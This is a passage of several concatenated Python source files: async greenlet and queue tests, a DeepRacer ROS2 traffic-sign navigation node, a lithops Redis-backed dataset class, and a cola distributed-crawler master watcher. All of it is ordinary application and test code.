        ):
            await greenlet_spawn(go)

        # Consume the replaced coroutine so no "never awaited" warning fires.
        await to_await

    @async_test
    async def test_await_only_error(self):
        to_await = run1()
        await to_await

        async def inner_await():
            nonlocal to_await
            to_await = run1()
            await_only(to_await)

        def go():
            await_only(inner_await())

        # Nested await_only from a plain coroutine (no greenlet) must raise.
        with expect_raises_message(
            exc.InvalidRequestError,
            r"greenlet_spawn has not been called; can't call await_\(\) here.",
        ):
            await greenlet_spawn(go)

        # Consume the replaced coroutine so no "never awaited" warning fires.
        await to_await

    @async_test
    @testing.requires.python37
    async def test_contextvars(self):
        import asyncio
        import contextvars

        var = contextvars.ContextVar("var")
        concurrency = 5

        async def async_inner(val):
            # The context variable set in task() must be visible inside
            # the coroutine awaited through the greenlet.
            eq_(val, var.get())
            return var.get()

        def inner(val):
            retval = await_only(async_inner(val))
            eq_(val, var.get())
            eq_(retval, val)
            return retval

        async def task(val):
            var.set(val)
            return await greenlet_spawn(inner, val)

        # Run several tasks concurrently; each must see its own value.
        values = {
            await coro
            for coro in asyncio.as_completed(
                [task(i) for i in range(concurrency)]
            )
        }
        eq_(values, set(range(concurrency)))

    @async_test
    async def test_require_await(self):
        def run():
            return 1 + 1

        assert (await greenlet_spawn(run)) == 2

        # With _require_await=True, a function that never awaits anything
        # is an error.
        with expect_raises_message(
            exc.AwaitRequired,
            "The current operation required an async execution but none was",
        ):
            await greenlet_spawn(run, _require_await=True)
class TestAsyncAdaptedQueue(fixtures.TestBase):
    """Tests for the asyncio-backed queue adapter used by the pool."""

    def test_lazy_init(self):
        # Flag mutated by the worker thread so the main thread can verify
        # the body actually ran (exceptions in threads are otherwise silent).
        run = [False]

        def thread_go(q):
            def go():
                q.get(timeout=0.1)

            # The queue binds lazily to the loop of the thread that first
            # uses it; an empty get times out with queue.Empty.
            with expect_raises(queue.Empty):
                asyncio.run(greenlet_spawn(go))
            run[0] = True

        t = threading.Thread(
            target=thread_go, args=[queue.AsyncAdaptedQueue()]
        )
        t.start()
        t.join()
        is_true(run[0])

    def test_error_other_loop(self):
        run = [False]

        def thread_go(q):
            def go():
                eq_(q.get(block=False), 1)
                q.get(timeout=0.1)

            # Using a queue already bound to another thread's event loop
            # must fail with the asyncio "different loop" error.
            with expect_raises_message(
                RuntimeError, "Task .* attached to a different loop"
            ):
                asyncio.run(greenlet_spawn(go))
            run[0] = True

        # Bind the queue to this thread's loop machinery first.
        q = queue.AsyncAdaptedQueue()
        q.put_nowait(1)
        t = threading.Thread(target=thread_go, args=[q])
        t.start()
        t.join()
        is_true(run[0])
|
deepdriver_navigation_node.py | #################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
deepdriver_navigation_node.py
This module decides the action messages (servo control messages specifically angle
and throttle) to be sent out using the detection deltas from object_detection_node.
The node defines:
detection_delta_subscriber: A subscriber to the /object_detection_pkg/object_detection_delta
published by the object_detection_pkg with the normalized delta
of the detected object position from the target (reference) position
with respect to x and y axes.
The node defines:
action_publisher: A publisher to publish the action (angle and throttle values).
set_max_speed_service: A service to dynamically set MAX_SPEED_PCT representing
the max speed percentage scale as per request.
"""
import copy
import time
import signal
import threading
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy
from rclpy.callback_groups import MutuallyExclusiveCallbackGroup
from deepracer_interfaces_pkg.msg import ServoCtrlMsg, TrafficMsg
from deepracer_interfaces_pkg.srv import SetMaxSpeedSrv, SetLedCtrlSrv
from deepdriver_navigation_pkg import constants, utils, control_utils
class TrafficNavigationNode(Node):
    """Node responsible for deciding the action messages (servo control messages
    specifically angle and throttle) to be sent out using the detection deltas
    from object_detection_node.

    Three background threads are owned by this node:
      * main_loop  - periodically plans and publishes the servo action.
      * sign_loop  - consumes traffic sign/light detections and updates the
                     driving state and LED request.
      * led_loop   - drives the LED service, including blinking.
    """

    def __init__(self, qos_profile):
        """Create a TrafficNavigationNode.

        Args:
            qos_profile (QoSProfile): QoS settings for the publisher and the
                detection subscription.
        """
        super().__init__("deepdriver_navigation_node")
        self.get_logger().info("deepdriver_navigation_node started.")
        # Double buffer to hold the input inferences from object detection.
        self.sign_msg_buffer = utils.DoubleBuffer(clear_data_on_get=True)
        self.line_msg_buffer = utils.DoubleBuffer(clear_data_on_get=True)
        # Creating publisher to publish action (angle and throttle).
        self.action_publisher = self.create_publisher(
            ServoCtrlMsg, constants.ACTION_PUBLISH_TOPIC, qos_profile
        )
        # Service to dynamically set MAX_SPEED_PCT.
        self.set_max_speed_service = self.create_service(
            SetMaxSpeedSrv, constants.SET_MAX_SPEED_SERVICE_NAME, self.set_max_speed_cb
        )
        # Client for the LED control service. Own callback group so the LED
        # thread's async calls do not contend with other callbacks.
        set_led_color_cb_group = MutuallyExclusiveCallbackGroup()
        self.set_led_ctrl_client = self.create_client(
            SetLedCtrlSrv,
            constants.SET_LED_CTRL_SERVICE,
            callback_group=set_led_color_cb_group,
        )
        while not self.set_led_ctrl_client.wait_for_service(timeout_sec=1.0):
            self.get_logger().info(
                f"{self.set_led_ctrl_client.srv_name} service not available, waiting again..."
            )
        # Create subscription to object detections from the traffic sign node.
        self.traffic_sign_results_subscriber = self.create_subscription(
            TrafficMsg,
            constants.TRAFFIC_SIGN_RESULTS_TOPIC,
            self.traffic_msg_cb,
            qos_profile,
        )
        self.lock = threading.Lock()
        # Boolean to control stop/start state.
        self.is_driving = True
        # Default maximum speed percentage (updated as per request using service call).
        self.max_speed_pct = constants.MAX_SPEED_PCT
        # Current LED request; the LED thread reconciles the device to this.
        self.led_blinking = False
        self.led_color = constants.RGB_COLOR_MAP["black"]
        # Create a background servo publish thread.
        self.stop_thread = False
        self.thread_initialized = False
        self.thread = threading.Thread(target=self.main_loop)
        self.thread.start()
        self.thread_initialized = True
        # Create a separate thread to deal with traffic sign input.
        self.stop_sign_thread = False
        self.sign_thread_initialized = False
        self.sign_thread = threading.Thread(target=self.sign_loop)
        self.sign_thread.start()
        self.sign_thread_initialized = True
        # Launching a separate thread to deal with the LED.
        self.stop_led_thread = False
        self.led_thread_initialized = False
        self.led_thread = threading.Thread(target=self.led_loop)
        self.led_thread.start()
        self.led_thread_initialized = True
        self.get_logger().info("Waiting for input...")

    def wait_for_thread(self):
        """Join every background thread that was started.

        BUGFIX: previously only the servo thread was joined, so the sign and
        LED threads were left running on shutdown. The sign thread can be
        blocked on its input buffer, so those joins use a short timeout to
        avoid hanging shutdown.
        """
        if self.thread_initialized:
            self.thread.join()
        if self.sign_thread_initialized:
            self.sign_thread.join(timeout=1.0)
        if self.led_thread_initialized:
            self.led_thread.join(timeout=1.0)
        self.get_logger().info("Thread joined")

    def thread_shutdown(self):
        """Signal all background threads to shut down.

        BUGFIX: stop_sign_thread and stop_led_thread were never set anywhere,
        so the sign and LED loops could never be asked to terminate.
        """
        self.stop_thread = True
        self.stop_sign_thread = True
        self.stop_led_thread = True

    def traffic_msg_cb(self, msg):
        """Buffer an incoming TrafficMsg from the traffic sign node."""
        self.sign_msg_buffer.put(msg)

    def line_msg_cb(self, msg):
        """Buffer an incoming line-detection message."""
        self.line_msg_buffer.put(msg)

    def set_led_ctrl_cb(self, req, res):
        """Placeholder LED control service callback (intentionally a no-op)."""
        pass

    def set_max_speed_cb(self, req, res):
        """Callback which dynamically sets the max_speed_pct.

        Args:
            req (SetMaxSpeedSrv.Request): Request object with the updated
                                          max speed percentage.
            res (SetMaxSpeedSrv.Response): Response object with error(int) flag
                                           indicating successful max speed pct
                                           update.

        Returns:
            SetMaxSpeedSrv.Response: Response object with error(int) flag
                indicating successful max speed pct update.
        """
        with self.lock:
            try:
                self.max_speed_pct = req.max_speed_pct
                self.get_logger().info(
                    f"Incoming request: max_speed_pct: {req.max_speed_pct}"
                )
                res.error = 0
            except Exception as ex:
                self.get_logger().error(f"Failed set max speed pct: {ex}")
                res.error = 1
        return res

    def led_loop(self):
        """Background loop that reconciles the physical LED with the
        requested color/blink state, issuing a service call only when the
        effective color actually changes."""
        try:
            blink = False
            blink_interval = 1.0
            last_update = time.time()
            current_color = None
            while not self.stop_led_thread:
                if self.led_blinking:
                    current_time = time.time()
                    # Toggle the blink phase once per interval.
                    if current_time - last_update >= blink_interval:
                        blink = not blink
                        last_update = current_time
                else:
                    blink = False
                # During the "off" blink phase the LED shows black.
                if blink:
                    selected_color = constants.RGB_COLOR_MAP["black"]
                else:
                    selected_color = self.led_color
                if current_color != selected_color:
                    # Scale 8-bit channel values to the service's range.
                    LED_SCALING_FACTOR = 39215
                    set_led_color_req = SetLedCtrlSrv.Request()
                    r, g, b = selected_color
                    set_led_color_req.red = r * LED_SCALING_FACTOR
                    set_led_color_req.green = g * LED_SCALING_FACTOR
                    set_led_color_req.blue = b * LED_SCALING_FACTOR
                    self.set_led_ctrl_client.call_async(set_led_color_req)
                    current_color = copy.copy(selected_color)
                time.sleep(constants.DEFAULT_SLEEP)
        except Exception as ex:
            self.get_logger().error(f"Failed to update car LED: {ex}")
            # Stop the car for safety and tear the node down.
            self.is_driving = False
            # Destroy the ROS Node running in another thread as well.
            self.destroy_node()
            rclpy.shutdown()

    def update_led(self, color="black", blinking=False):
        """Set the requested LED color/blink state (applied by led_loop)."""
        self.led_color = constants.RGB_COLOR_MAP[color]
        self.led_blinking = blinking

    def update_driving_state(self, is_driving=False):
        """Set whether the car should currently be driving."""
        self.is_driving = is_driving

    def sign_loop(self):
        """Function which runs in a separate thread and processes the input
        from traffic signs and lights, updating LED and driving state."""
        try:
            # BUGFIX: poll this thread's own stop flag (was stop_thread).
            while not self.stop_sign_thread:
                # Get a new message to plan action.
                traffic_msg = self.sign_msg_buffer.get()
                signs = traffic_msg.signs
                lights = traffic_msg.lights
                # Merge the list of objects
                objects = signs + lights
                # TrafficLight and TrafficSign both have a distance field so
                # we can sort to get the closest.
                objects = list(sorted(objects, key=lambda x: x.distance))
                closest_object = None
                if len(objects) > 0:
                    closest_object = objects[0]
                    self.get_logger().info(f"Closest: {closest_object}")
                # If no object, clear the LED and continue driving.
                if not closest_object:
                    self.update_led()
                    self.update_driving_state(is_driving=True)
                    continue
                # If object too far away, clear the LED and continue driving.
                if closest_object.distance >= constants.DISTANCE_THRESHOLD:
                    self.update_led()
                    self.update_driving_state(is_driving=True)
                    continue
                # If object detected:
                if closest_object.type == "stop sign":
                    self.update_led(color="red", blinking=True)
                    self.update_driving_state(is_driving=False)
                elif closest_object.type == "traffic light":
                    self.update_led(color=closest_object.color)
                    self.update_driving_state(
                        is_driving=closest_object.color == "green"
                    )
                else:
                    self.get_logger().error(
                        f"No logic for object type {closest_object.type}"
                    )
                    # Stop the car for safety reasons.
                    self.update_driving_state(is_driving=False)
                    self.update_led()
        except Exception as ex:
            self.get_logger().error(f"Failed to process traffic sign input: {ex}")
            # Stop the car for safety reasons.
            self.update_driving_state(is_driving=False)
            # Stop the car
            msg = ServoCtrlMsg()
            msg.angle, msg.throttle = (
                constants.ActionValues.DEFAULT,
                constants.ActionValues.DEFAULT,
            )
            self.action_publisher.publish(msg)
            # Destroy the ROS Node running in another thread as well.
            self.destroy_node()
            rclpy.shutdown()

    def plan_action(self, delta_x):
        """Pick the next action category.

        Args:
            delta_x: Horizontal detection delta; currently unused because the
                     node only drives straight ahead or stops.

        Returns:
            The action-space category to publish.
        """
        if not self.is_driving:
            # No Action
            return constants.ACTION_SPACE[1][constants.ActionSpaceKeys.CATEGORY]
        # For now only drive straight ahead.
        return constants.ACTION_SPACE[2][constants.ActionSpaceKeys.CATEGORY]

    def main_loop(self):
        """Function which runs in a separate thread and decides the actions
        the car should take based on the input from the traffic signs node.
        """
        msg = ServoCtrlMsg()
        msg.angle, msg.throttle = (
            constants.ActionValues.DEFAULT,
            constants.ActionValues.DEFAULT,
        )
        try:
            while not self.stop_thread:
                # Keep planning new actions, car may need to stop because of sign input.
                action_category = self.plan_action(0)
                msg.angle, msg.throttle = control_utils.get_mapped_action(
                    action_category, self.max_speed_pct
                )
                # Log the action.
                action = constants.ACTION_SPACE[action_category][
                    constants.ActionSpaceKeys.ACTION
                ]
                self.get_logger().info(f"Action -> {action}")
                # Publish blind action
                self.action_publisher.publish(msg)
                time.sleep(constants.DEFAULT_SLEEP)
        except Exception as ex:
            self.get_logger().error(f"Failed to publish action to servo: {ex}")
            # Stop the car
            msg = ServoCtrlMsg()
            msg.angle, msg.throttle = (
                constants.ActionValues.DEFAULT,
                constants.ActionValues.DEFAULT,
            )
            self.action_publisher.publish(msg)
            # Destroy the ROS Node running in another thread as well.
            self.destroy_node()
            rclpy.shutdown()
def main(args=None):
    """Entry point: create the navigation node and spin it on a
    multi-threaded executor until interrupted.

    Args:
        args: Command-line arguments forwarded to rclpy.init.
    """
    rclpy.init(args=args)
    qos = QoSProfile(
        reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
        depth=1,
        history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST,
    )
    # BUGFIX: pre-bind the node name so the except/cleanup paths below do not
    # raise NameError when the constructor itself fails.
    deepdriver_navigation_node = None
    try:
        deepdriver_navigation_node = TrafficNavigationNode(qos)
        executor = MultiThreadedExecutor()

        def signal_handler(signum, frame):
            """Callback function to handle registered signal handler
            to join and stop executing running thread created.

            Args:
                signum: The signal number.
                frame: the current stack frame (None or a frame object).
            """
            deepdriver_navigation_node.get_logger().info("Signal Handler initiated")
            deepdriver_navigation_node.thread_shutdown()
            deepdriver_navigation_node.wait_for_thread()

        # Register SIGINT handler
        signal.signal(signal.SIGINT, signal_handler)
        rclpy.spin(deepdriver_navigation_node, executor)
    except Exception as ex:
        if deepdriver_navigation_node is not None:
            deepdriver_navigation_node.get_logger().error(
                f"Exception in TrafficNavigationNode: {ex}"
            )
    finally:
        # BUGFIX: single cleanup path; previously the except branch destroyed
        # the node and shut rclpy down, then the function tail did it again.
        if deepdriver_navigation_node is not None:
            deepdriver_navigation_node.destroy_node()
        if rclpy.ok():
            rclpy.shutdown()


if __name__ == "__main__":
    main()
|
datasetbase.py | import redis
import itertools
import hashlib
import cloudpickle
import logging
import threading
import msgpack
import lithops
from lithopsext import utils
from .core import _task_worker
logger = logging.getLogger('lithops')
DEBUG = True
class DatasetBase:
    """Base class for a partitioned dataset executed over lithops workers.

    Tasks are broadcast to the workers through a Redis pub/sub channel
    (plus a task log list for late joiners) and results are collected back
    through per-task Redis hashes.
    """

    def __init__(self):
        self._partitions = []
        self._lithops_storage = lithops.storage.Storage()
        self._lithops_executor = lithops.FunctionExecutor()
        self._group_id = '-'.join(['lithops', self._lithops_executor.executor_id, 'group'])
        self._red = redis.Redis(**utils.extract_redis_config())
        self._pool_active = False
        self._task_counter = itertools.count(0)
        self._worker_futures = []
        # Fail fast if Redis is unreachable.
        assert self._red.ping()

    @property
    def _num_partitions(self):
        # One worker is spawned per partition.
        return len(self._partitions)

    def parallel_apply(self, f, *args, **kwargs):
        """Run *f* on every partition in parallel.

        Pickles the function (content-addressed so repeated submissions of
        the same function are stored once) and its arguments into Redis,
        publishes the task to the worker group, lazily starts the worker
        pool on first use, then blocks until results arrive.

        Args:
            f: Function to apply on each partition.
            *args, **kwargs: Extra arguments forwarded to *f*.

        Returns:
            The first element of the collected results list.
        """
        task_id = self._group_id + '-' + str(next(self._task_counter)).zfill(3)
        func_pickle = cloudpickle.dumps(f)
        func_pickle_hash = hashlib.md5(func_pickle).hexdigest()
        func_key = '-'.join(['func', f.__name__, func_pickle_hash])
        if not self._red.hexists(self._group_id, func_key):
            self._red.hset(self._group_id, func_key, func_pickle)
        args_pickle = cloudpickle.dumps({'args': args, 'kwargs': kwargs})
        args_key = 'args-{}'.format(task_id)
        self._red.hset(self._group_id, args_key, args_pickle)
        task = {'action': 'task',
                'task_id': task_id,
                'group_size': self._num_partitions,
                'task_join_bl': '{}-bl'.format(task_id),
                'task_join_counter': '{}-cnt'.format(task_id),
                'func_key': func_key,
                'args_key': args_key}
        msg = msgpack.packb(task)
        logger.debug('Submit task {} from host'.format(task_id))
        self._red.publish(self._group_id + '_chan', msg)
        self._red.lpush(self._group_id + '_tasklog', msg)
        if not self._pool_active:
            if not DEBUG:
                logger.debug('Using lithops')
                # BUGFIX: was self._shards, an attribute that is never
                # defined anywhere -- the lithops path raised AttributeError.
                self._worker_futures = self._lithops_executor.map(
                    _task_worker, self._partitions,
                    extra_args={'group_id': self._group_id})
            else:
                logger.debug('Using threading')
                self._worker_futures = []
                for i, shard in enumerate(self._partitions):
                    thread = threading.Thread(target=_task_worker, args=(i, shard, self._group_id))
                    thread.start()
                    self._worker_futures.append(thread)
            self._pool_active = True
        results = None
        wait_loop = True
        logger.debug('Host for task {} completion on list {}...'.format(task_id, task['task_join_bl']))
        while wait_loop:
            # Block up to 5 s waiting for the completion marker.
            res = self._red.blpop(task['task_join_bl'], timeout=5)
            if res is None:
                # BUGFIX: this log line used to fire even when a result was
                # popped successfully; it belongs to the timeout branch only.
                logger.debug('Time out reached, trying to get functions results...')
                if not DEBUG:
                    # Raises here if any lithops worker failed, instead of
                    # looping forever.
                    worker_status = self._lithops_executor.get_result(fs=self._worker_futures)
                else:
                    # BUGFIX: was all(p.is_alive()), which declared the pool
                    # "done" while every worker thread was still running.
                    workers_done = all(not p.is_alive() for p in self._worker_futures)
                    if workers_done:
                        worker_status = [p.join() for p in self._worker_futures]
            else:
                logger.debug('Task {} complete'.format(task_id))
                results_pickle = self._red.hgetall(task['task_id']).values()
                results = [cloudpickle.loads(res) for res in results_pickle]
                wait_loop = False
        return results[0]
class PartitionBase:
    """Minimal interface for a single dataset partition; subclasses are
    expected to provide a storage key and a way to fetch the data."""

    @property
    def key(self):
        # Storage key identifying this partition; the base class has none.
        return None

    def get(self):
        # Retrieve the partition's data; intentionally a no-op here.
        pass
|
watcher.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (c) 2013 Qin Xuye <qin@qinxuye.me>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on 2013-6-5
@author: Chine
'''
import time
import threading
import os
import subprocess
import shutil
from cola.core.rpc import client_call, ColaRPCServer, \
FileTransportServer, FileTransportClient
from cola.core.zip import ZipHandler
from cola.core.utils import get_ip, get_ips, \
import_job, root_dir
from cola.core.config import main_conf
# Lifecycle states of a node watcher as seen from the master.
RUNNING, HANGUP, STOPPED = range(3)
# Consecutive heartbeats required before a blacklisted node is restored
# (comment at the check site says "more than 10 min" -- at 20 s per
# heartbeat 90 beats is 30 min; the intended figure is unclear).
CONTINOUS_HEARTBEAT = 90
# Seconds between heartbeats sent by node watchers.
HEARTBEAT_INTERVAL = 20
# A node is considered hung after missing this many seconds of heartbeats.
HEARTBEAT_CHECK_INTERVAL = 3*HEARTBEAT_INTERVAL

class MasterWatcherRunning(Exception): pass
class MasterJobInfo(object):
    """Book-keeping for one running job: the job master's address, the
    worker endpoints, and the subprocess running the job loader."""

    def __init__(self, port, nodes_ip_addresses, worker_port, popen=None):
        """
        Args:
            port: RPC port of the job master on this machine.
            nodes_ip_addresses: IPs of the worker nodes.
            worker_port: Port each worker listens on.
            popen: Optional subprocess.Popen handle of the job loader.
        """
        self.job_master = '%s:%s' % (get_ip(), port)
        self.nodes = [
            '%s:%s'%(node_ip, worker_port) for node_ip in nodes_ip_addresses
        ]
        self.worker_port = worker_port
        # BUGFIX: the popen argument was silently discarded (self.popen was
        # hard-coded to None), so kill() could never terminate a job whose
        # process handle was supplied at construction time.
        self.popen = popen

    def add_worker(self, node):
        """Add a worker (normalized to ip:port) and notify the job master."""
        if ':' not in node:
            node = '%s:%s' % (node, self.worker_port)
        self.nodes.append(node)
        client_call(self.job_master, 'add_node', node, ignore=True)

    def remove_worker(self, node):
        """Remove a worker (normalized to ip:port) and notify the job master."""
        if ':' not in node:
            node = '%s:%s' % (node, self.worker_port)
        self.nodes.remove(node)
        client_call(self.job_master, 'remove_node', node, ignore=True)

    def has_worker(self, node):
        """Return True if the (normalized) worker endpoint is registered."""
        if ':' not in node:
            node = '%s:%s' % (node, self.worker_port)
        return node in self.nodes
class WatcherInfo(object):
    """Heartbeat book-keeping for a single node watcher.

    Note: the ``watcher`` argument is currently unused; the identity is
    kept as the key of MasterWatcher.nodes_watchers instead.
    """

    def __init__(self, watcher):
        # New watchers start RUNNING with one heartbeat on record.
        self.status = RUNNING
        self.continous_register = 1
        self.last_update = int(time.time())

    def register(self):
        # Record a heartbeat: extend the consecutive streak and refresh
        # the last-seen timestamp.
        self.continous_register += 1
        self.last_update = int(time.time())
class MasterWatcher(object):
    """RPC-driven supervisor running on the master machine.

    Tracks node watchers via heartbeats, distributes job zip files to the
    workers, and starts/stops/cleans jobs across the cluster.

    NOTE(review): this file uses Python 2 idioms (dict.iteritems, implicit
    list-returning keys()) -- it will not run unmodified on Python 3.
    """

    def __init__(self, root, zip_dir, job_dir,
                 ip_address=None, data_path=None, force=False):
        # root:    directory holding the watcher's lock file.
        # zip_dir: where uploaded job zips are received.
        # job_dir: where job zips are uncompressed to.
        # force:   remove a stale lock file instead of refusing to start.
        self.root = root
        self.zip_dir = zip_dir
        self.job_dir = job_dir
        self.data_path = data_path
        self.force = force
        # watcher endpoint -> WatcherInfo (heartbeat state).
        self.nodes_watchers = {}
        # job real name -> MasterJobInfo.
        self.running_jobs = {}
        # Watchers considered dead until they heartbeat consistently again.
        self.black_list = []
        if ip_address is None:
            ip_address = get_ip()
        else:
            choices_ips = get_ips()
            if ip_address not in choices_ips:
                raise ValueError('IP address must be one of (%s)' % ','.join(choices_ips))
        self.ip_address = ip_address
        self.port = main_conf.master.port
        self.stopped = False
        # Refuse to start (or force-clear the lock) if another master
        # watcher appears to be running.
        self.check(force=force)
        self.init_rpc_server()
        self.rpc_server.register_function(self.register_watcher_heartbeat,
                                          'register_heartbeat')
        self.rpc_server.register_function(self.stop, 'stop')
        self.rpc_server.register_function(self.list_jobs, 'list_jobs')
        self.rpc_server.register_function(self.start_job, 'start_job')
        self.rpc_server.register_function(self.stop_job, 'stop_job')
        self.rpc_server.register_function(self.finish_job, 'finish_job')
        self.rpc_server.register_function(self.clear_job, 'clear_job')
        self.rpc_server.register_function(self.list_job_dirs, 'list_job_dirs')
        self.rpc_server.register_function(self.list_workers, 'list_workers')
        # Accept job zip uploads into zip_dir.
        self.set_receiver(zip_dir)

    def init_rpc_server(self):
        """Start the RPC server in a daemon thread."""
        rpc_server = ColaRPCServer((self.ip_address, self.port))
        thd = threading.Thread(target=rpc_server.serve_forever)
        thd.setDaemon(True)
        thd.start()
        self.rpc_server = rpc_server

    def check(self, force=False):
        # Raise if a lock file from another live watcher exists.
        if not self.check_env(force=force):
            raise MasterWatcherRunning('There has been a running master watcher.')

    def check_env(self, force=False):
        """Acquire the on-disk lock file; return False if already held."""
        lock_f = os.path.join(self.root, 'lock')
        if os.path.exists(lock_f) and not force:
            return False
        if os.path.exists(lock_f) and force:
            try:
                os.remove(lock_f)
            except:
                return False
        open(lock_f, 'w').close()
        return True

    def finish(self):
        """Release the lock file and shut down the RPC server."""
        lock_f = os.path.join(self.root, 'lock')
        if os.path.exists(lock_f):
            os.remove(lock_f)
        self.rpc_server.shutdown()
        self.stopped = True

    def register_watcher_heartbeat(self, node_watcher):
        """RPC endpoint: record a heartbeat from a node watcher."""
        if node_watcher not in self.nodes_watchers:
            watcher_info = WatcherInfo(node_watcher)
            self.nodes_watchers[node_watcher] = watcher_info
        else:
            watcher_info = self.nodes_watchers[node_watcher]
            watcher_info.register()

    def start_check_worker(self):
        """Start the daemon thread that ages heartbeats: hung watchers are
        demoted RUNNING -> HANGUP -> STOPPED (and blacklisted, with their
        workers removed from running jobs); steadily-beating blacklisted
        watchers are restored."""
        def _check():
            # NOTE(review): iteritems is Python 2 only.
            for watcher, watcher_info in self.nodes_watchers.iteritems():
                ip_addr = watcher.split(':')[0]
                # if loose connection
                if int(time.time()) - watcher_info.last_update \
                    > HEARTBEAT_CHECK_INTERVAL:
                    watcher_info.continous_register = 0
                    if watcher_info.status == RUNNING:
                        watcher_info.status = HANGUP
                    elif watcher_info.status == HANGUP:
                        watcher_info.status = STOPPED
                        self.black_list.append(watcher)
                        for job_info in self.running_jobs.values():
                            if job_info.has_worker(ip_addr):
                                job_info.remove_worker(ip_addr)
                # if continously connect for more than 10 min
                elif watcher_info.continous_register >= CONTINOUS_HEARTBEAT:
                    if watcher_info.status != RUNNING:
                        watcher_info.status = RUNNING
                    if watcher in self.black_list:
                        self.black_list.remove(watcher)
                    for job_info in self.running_jobs.values():
                        if not job_info.has_worker(ip_addr):
                            job_info.add_worker(ip_addr)

        def _start():
            while not self.stopped:
                _check()
                time.sleep(HEARTBEAT_CHECK_INTERVAL)

        thread = threading.Thread(target=_start)
        thread.setDaemon(True)
        thread.start()
        return thread

    def list_workers(self):
        # RPC endpoint: endpoints of all known node watchers.
        return self.nodes_watchers.keys()

    def list_jobs(self):
        # RPC endpoint: real names of all running jobs.
        return self.running_jobs.keys()

    def list_job_dirs(self):
        # RPC endpoint: names of job directories on disk.
        return os.listdir(self.job_dir)

    def set_receiver(self, base_dir):
        """Attach a file-transport receiver (job zip uploads) to the RPC server."""
        serv = FileTransportServer(self.rpc_server, base_dir)
        return serv

    def start_job(self, zip_filename, uncompress=True, client=None):
        """RPC endpoint: distribute and launch a job.

        When uncompress is True, the zip is pushed to every other node
        watcher and unpacked locally; then the job loader subprocess is
        started and every worker watcher is told to start the job too.
        """
        if uncompress:
            zip_file = os.path.join(self.zip_dir, zip_filename)
            # transfer zip file to workers
            for watcher in self.nodes_watchers:
                # Skip ourselves; the file is already here.
                if watcher.split(':')[0] == self.ip_address:
                    continue
                file_trans_client = FileTransportClient(watcher, zip_file)
                file_trans_client.send_file()
            job_dir = ZipHandler.uncompress(zip_file, self.job_dir)
        else:
            job_dir = os.path.join(self.job_dir, zip_filename.rsplit('.', 1)[0])
        job = import_job(job_dir)

        worker_port = job.context.job.port
        port = job.context.job.master_port
        nodes = [watcher.split(':')[0] for watcher in self.nodes_watchers]
        if len(nodes) > 0:
            info = MasterJobInfo(port, nodes, worker_port)
            self.running_jobs[job.real_name] = info

            # Launch the job loader as a subprocess on this machine.
            dirname = os.path.dirname(os.path.abspath(__file__))
            f = os.path.join(dirname, 'loader.py')
            workers = ['%s:%s'%(node, worker_port) for node in nodes]
            cmds = ['python', f, '-j', job_dir, '-i', self.ip_address,
                    '-n', ' '.join(workers)]
            if self.data_path is not None:
                cmds.extend(['-d', self.data_path])
            if self.force:
                cmds.append('-f')
            if client is not None:
                cmds.extend(['-c', client])
            popen = subprocess.Popen(cmds)
            info.popen = popen

            # call workers to start job
            for worker_watcher in self.nodes_watchers:
                client_call(worker_watcher, 'start_job', zip_filename, uncompress, ignore=True)

    def stop_job(self, job_real_name):
        """RPC endpoint: stop a running job on the master and all workers."""
        if job_real_name not in self.running_jobs:
            return False
        job_info = self.running_jobs[job_real_name]
        try:
            client_call(job_info.job_master, 'stop', ignore=True)
        finally:
            # Even if the job master is unreachable, still kill the
            # worker processes and the local loader.
            for watcher in self.nodes_watchers.keys():
                client_call(watcher, 'kill', job_real_name, ignore=True)
            self.kill(job_real_name)
        return True

    def finish_job(self, job_real_name):
        # RPC endpoint: forget a job once it has completed.
        del self.running_jobs[job_real_name]

    def clear_job(self, job_name):
        """RPC endpoint: delete a job's directory here and on all workers."""
        job_name = job_name.replace(' ', '_')
        path = os.path.join(self.job_dir, job_name)
        shutil.rmtree(path)
        for watcher in self.nodes_watchers:
            # NOTE(review): job_name is not forwarded to the workers here,
            # unlike the other broadcasts -- confirm whether the worker-side
            # 'clear_job' needs the name.
            client_call(watcher, 'clear_job', ignore=True)

    def stop(self):
        """RPC endpoint: stop all jobs, all node watchers, then this watcher."""
        # stop all jobs
        for job_name in self.running_jobs.keys():
            self.stop_job(job_name)
        for watcher in self.nodes_watchers:
            client_call(watcher, 'stop', ignore=True)
        self.finish()

    def kill(self, job_realname):
        # Terminate the local loader subprocess of the given job, if any.
        if job_realname in self.running_jobs.keys():
            self.running_jobs[job_realname].popen.kill()

    def run(self):
        # Block on the heartbeat-checking thread (daemon, runs until stop()).
        thread = self.start_check_worker()
        thread.join()

    def __enter__(self):
        return self

    def __exit__(self, type_, value, traceback):
        # Always release the lock file and RPC server on context exit.
        self.finish()
def makedirs(path):
    """Create *path* (including parents) unless it already exists."""
    if os.path.exists(path):
        return
    os.makedirs(path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser('Cola master watcher')
parser.add_argument('-d', '--data', metavar='data root directory', nargs='?',
default=None, const=None,
help='root directory to put data')
parser.add_argument('-i', '--ip', metavar='IP address', nargs='?',
default=None, const=None,
help='IP Address to start')
parser.add_argument('-f', '--force', metavar='force start', nargs='?',
default=False, const=True, type=bool)
args = parser.parse_args()
data_path = args.data
if data_path is None:
data_path = os.path.join(root_dir(), 'data')
ip = args.ip
force = args.force
root = os.path.join(data_path, 'master', 'watcher')
